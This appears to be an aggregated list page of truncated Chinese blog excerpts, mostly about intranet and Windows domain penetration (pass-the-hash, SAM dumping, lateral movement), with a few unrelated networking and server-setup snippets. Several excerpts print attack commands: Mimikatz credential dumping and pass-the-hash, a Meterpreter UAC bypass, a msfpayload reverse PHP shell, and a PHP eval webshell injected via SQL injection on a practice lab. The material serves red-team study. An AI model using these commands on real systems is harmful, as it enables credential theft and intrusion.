前言: 我们在平常打点的时候,遇到有内网或者有域的环境的时候,我们只获得了内网中的一台机子的shell,由这台机子我们可以获得这台机子所在的网段的相关其他主机.比如说有域的时候的域控机,有多层内网的堡垒机等,下面将介绍如何用已控制的内网机拿到域控的方法. 0x00 环境 假如是一个域环境: 域控: 192.168.106.129 已经控制的内网机: 192.168.106.120 其他假如存在一些其他普通的机子. 0x01 内网信息收集 初步的查看网络信息: ipconfig /all nets…

0x01 PTH简介 PTH,即Pass-The-Hash,首先我们来说下为什么要使用HASH传递,一是在目标机>=win server 2012时,lsass.exe进程中是抓不到明文密码的,二是随着信息安全意识的提高,弱口令情况逐渐降低,我们经常会遇到拿到hash却解不开的情况,综上,只有hash,我们依然可以正常登录. PTH攻击最酷的地方并不是hash传递利用的过程,而是hash的获取过程,所以接下来90%的篇幅为hash获取的内容. 0x02 Hash获取 普通PC的Hash获取 2.…

内网技巧-通过SAM数据库获得本地用户hash的方法 在windows上的C:\Windows\System32\config目录保存着当前用户的密码hash.我们可以使用相关手段获取该hash. 提取的时候需要管理员权限,普通权限没办法提取出来 方案一 secretsdump.py 利用工具 https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py #!/usr/bin/env python f…

背景知识 Windows 横向渗透的两种方式 1.hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH: 2.ticket传递攻击,通过传递kerberos的ticket,登录机器,简称PtT: 以上两种都是常见的域内或者叫做内网渗透的横向移动的常见手段. NTLM协议机制简述 在hash传递攻击中.传递的就是NTLMhash值,这里我们就要简述一下NTLM的过程. NTLM的诞生 早期SMB协议在网络上传递是明文的username和password,后来出现了简称为LM的局域网管…

对内网渗透需要渗透的目标主机处于跨网段和uac限制的情况做一个渗透记录 环境大致如下 拥有shell权限的win7(有uac限制,处于双网段) 和同win7同一网段下暂时无权限的靶机xp 先对有权限的win7进行hashdump 显示失败 getsystem一下 还是失败 用msf的模块绕过uac use exploit/windows/local/bypassuac set session 1(session1 为我们的win7权限) 此时再进入meterpreter  hashdump下 g…

Redis语法 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统. Redis是一个开源的使用ANSI C语言编写.遵守BSD协议.支持网络.可基于内存亦可持久化的日志型.Key-Value数据库,并提供多种语言的API. 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类…

前言:全国HW刚结束,加强一波内网概念,去年11月红队成绩并不理想,这次必拿下好成绩.冲!!! 0x00 本地认证 本地认证基础知识 在本地登录Windows的情况下,操作系统会使用用户输入的密码作为凭证去与系统中的密码进行验证,但是操作系统中的密码存储在哪里呢? %SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的"密码"与我们输入的"密码"进行比对,如果相同,证明认证成功! 这个SAM文件中保留了…

内网渗透-横向移动 #建立ipc连接并将后门添加至计划任务 前置条件:获取到某域主机权限->得到明文或者hash,通过信息收集到的用户列表当做用户名字典->用得到的密码明文当做密码字典 本次移动流程:尝试建立连接(ipc)->创建计划任务(at|schtasks)->执行命令,上传后门 什么是IPC? IPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的…

前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…

(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接. ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的. I: 不具备系统权限: ①  Ser…

from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php 将文件传入shell中,在msf中开一个handlermsf > use multi/handlermsf exploit(handler) > set PAYLOAD php/rever…

1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\drivers\etc\hosts),DNS服务器,NetBIOS广播,如果前2个请求失败,则在本地发送NetBIOS广播请求,此时任何本地网络的系统都能回答这个请求,使用SpiderLabs出品的Responder工具,能够在不借助ARP欺骗的情况下,响应这个请求.其实metasploit也能利用(…

对于付不起钱的小伙计,为了给公司省钱,想尽一切招数.今天就来分享一个使用阿里云OSS存储搭配CDN使用的网站服务器部署方法. 简介 阿里云OSS 阿里云提供的一种文件存储方案,和我们以前接触的百度云BCS和新浪云的Storage是一个道理,即文件的云端存储方案.一般而言,OSS只存储网站所需要的静态文件,而不存储程序文件.例如将网站的图片.视频.脚本.样式等文件存储在OSS,同时,OSS实际上有点类似我们以前使用的第三方服务商提供的相册,OSS上的文件,阿里云会给一个url让你可以直接使用.在依…

本文引用了“帅地”发表于公众号苦逼的码农的技术分享. 1.引言 搞网络通信应用开发的程序员,可能会经常听到外网IP(即互联网IP地址)和内网IP(即局域网IP地址),但他们的区别是什么?又有什么关系呢?另外,内行都知道,提到外网IP和内网IP就不得不提NAT路由转换这种东西,那这双是什么鬼?本文就来简单讲讲这些到底都是怎么回事.   另外,以下是与本文内相关知识点有关联的文章,可详细阅读之: <P2P 技术详解(一):NAT详解——详细原理.P2P简介> <P2P 技术详解(二):P2P…

先上一个我的正常使用的配置 location / { proxy_pass http://192.168.1.84:80; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_connect_timeout 300s; proxy_rea…

一.事件起因 客户向公司反映使用IDS设备捕获到木马上线域名需要处理,虽然是逆向岗但还是有预感未来应急响应的工作只会越来越多.所以作为新人的我选择了跟带头BOSS去现场学习,并且将自己参与应急响应中的工作和思路进行记录. 二.前置知识 1)动态域名解析 用户每一次上网时运营商都会随机分配一个IP地址.安装在用户主机里的动态域名软件会把这个IP地址发送到动态域名解析服务器.Internet上的主机要访问这个域名时动态域名解析服务器会返回当前用户主机IP地址给它. 这就叫动态域名解析. 2)木马类型…

Hash(Key) 获取 工具: Mimikatz 用法: .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话) sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx /domain:xxxxxxx /ntlm:xxxxxxxxxxxx #hash传递 sekurlsa::pt…

搞网络通信应用开发的程序员,可能会经常听到外网IP(即互联网IP地址)和内网IP(即局域网IP地址),但他们的区别是什么? 1.引言 搞网络通信应用开发的程序员,可能会经常听到外网IP(即互联网IP地址)和内网IP(即局域网IP地址),但他们的区别是什么?又有什么关系呢?另外,内行都知道,提到外网IP和内网IP就不得不提NAT路由转换这种东西,那这双是什么鬼?本文就来简单讲讲这些到底都是怎么回事. 2.每台电脑都必须要一个公网IP吗? 答案:不是. 我们都知道,IPv4中的IP地址的数量是有限的…

开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "" /user:"administrator"进行连接 net use \\目标IP\ipc$ 试环境:主机(windows XP sp3)与windows XP sp2虚拟机)   通过IPC$与windowsXP建立连接,在现在的绝大多数的XP操作系统中总是会出现问题.以下如何解决…

作者:sai52[B.H.S.T] 国外大牛的作品,偶顺手写了个使用说明.E文好的看原文  http://www.sensepost.com/research/reDuh/ 这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路.用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口. 本机-------客户端---------(http隧道)-----------服务端------------------内网服务器 服务端是个webshell(针对…

负载均衡-Nginx中文文档 http://www.nginx.cn/doc/example/loadbanlance.html 负载均衡 一个简单的负载均衡的示例,把www.domain.com均衡到本机不同的端口,也可以改为均衡到不同的地址上. http { : upstream myproject { : server 127.0.0.1:8000 weight=3; : server 127.0.0.1:8001; : server 127.0.0.1:8002; : server 12…

文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域渗透中,横向移动最重要是对windows认证协议的理解 首先介绍一下windows密码的Hash: 早期SMB协议在网络上传输明文口令,后来出现"LAN Manager Challenge/Response"验证机制,简称LM,由于容易被破解,微软提出了windows NT挑战/响应机制,…

---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-the-hash) pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码. pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证 NTLM认证不使用明文口令,而是使用口令加…

由于公司内网有多台服务器的 http 服务要映射到公司外网静态 IP,如果用路由的端口映射来做,就只能一台内网服务器的 80 端口映射到外网 80 端口,其他服务器的 80 端口只能映射到外网的非 80 端口.非 80 端口的映射在访问的时候要域名加上端口,比较麻烦. 我们可以在内网搭建一个Nginx反向代理服务器,将Nginx反向代理服务器的80映射到外网IP的80,这样指向到公司外网IP的域名的HTTP请求就会发送到Nginx反向代理服务器,利用Nginx反向代理将不同域名的请求转发到内网不…

Penetration Testing不单单是一个博客,更热衷于技术分享的平台. 本文将讲述对国外某一hotel的渗透测试,让更多的人安全意识得到提高,有攻才有防,防得在好,也有疏忽的地方,这就是为啥你”老婆”原来是你失散多年的兄妹. 网站初探 本篇由于不是针对性的对目标进行渗透测试, 所以直接寻找网站的常见漏洞进行渗透.灰话不多扯. 首先了解一下网站的概况,查看网页链接,可以看出是asp.net写的,这里就可以猜测出服务器是windows+iis.使用火狐的Live HTTP headers插…

域内信息收集常用命令 net group /domain //获得所有域用户组列表 net group zzh /domain //显示域中zzh组的成员 net group zzh /del /domain //删除域中zzh组 net group zzh andy /del /domain //删除域内zzh 群组中的成员 andy net group zzh /add /domain //增加zzh域中的群组 net group "domain admins" /domain /…

本文为作者原创,转载请注明出处:https://www.cnblogs.com/leisure_chn/p/11899478.html 通常,我们用于调试的计算机无法远程访问位于局域网中的待调试设备.通过 ssh 的端口转发(又称 ssh 隧道)技术,可以实现这种远程调试功能. 下文中,sshc 指 ssh 客户端,sshd 指 ssh 服务器. 1. ssh 端口转发模式简介 ssh 客户端运行于本地机器,它的作用是:登录到目标机器并在目标机器上执行命令.它可以建立一个安全通道,为不安全网络上…

目录 内网服务器离线编译安装mysql5.7并调优 前言 关于MySQL 一.MySQL安装篇 部署环境 前期准备工具 挂载系统ISO镜像,配置yum源 二.MySQL调优篇 1.对MySQL进行安全设置 2.设置MySQL超时时间 3.MySQL配置文件优化参考1(按需配置即可) 4.MySQL配置文件优化参考2(按需配置即可) 内网服务器离线编译安装mysql5.7并调优 前言 ​ 根据安全性和保密性的要求,内网服务器是不能访问网络的,所以只能离线安装软件,安装MySQL的依赖包需要配置yu…

Ladon LadonGUI Cobalt Strike PowerLadon PythonLadon LinuxLadon 使用说明 ID 主题 URL 1 Ladon文档主页 https://github.com/k8gege/Ladon/wiki 2 基础用法详解 https://github.com/k8gege/Ladon/wiki/Ladon-Usage 3 Cobalt Strike https://github.com/k8gege/Aggressor 4 Exp生成器使用 ht…

1 基础知识1.1 网络熟悉常见网络协议:https://www.ietf.org/standards/rfcs/1.2 操作系统1.3 编程2 恶意软件分析2.1 分类2.1.1 木马2.1.2 Botnet2.1.3 挖矿2.1.4 勒索软件2.1.5 后门2.1.6 病毒2.1.7 蠕虫2.2 外部资源• VirusTotalhttps://www.virustotal.com/#/home/upload • 样本下载https://www.malware-traffic-analysis…